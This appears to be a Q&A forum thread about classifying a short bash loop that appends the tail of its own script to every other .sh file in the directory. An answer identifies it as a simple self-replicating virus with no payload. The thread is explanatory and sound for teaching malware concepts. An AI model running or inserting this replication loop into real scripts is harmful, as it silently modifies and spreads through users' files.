# Bash Script That Includes Malware

Tags: bash, polymorphism, malware

Consider the following code fragment (bash script):

```
for i in *.sh; do
    if test ./$i != $0; then
        tail -n 5 $0 | cat >> $i ;
    fi
done
```

What type of malicious software is this? Is it stealth, or/and
polymorphic and what is the payload effects, if there is any?

Can someone please help me with this one... Thanks

Comment: Please forgive my ignorance, but why do you say it's a malicious piece of code?

Comment: I did not say it is malicious... the question comes from a problem...

Answer (score 0, accepted):

It's a virus that appends itself to the end of every `*.sh` script in the current working directory. It does not contain any payload itself, but its many copies may become a nuisance.

Comment: Do you know if it is stealth/polymorphic?

Comment: It does not make any attempt to change itself while copying, nor does it make any attempt to conceal its purpose, does it?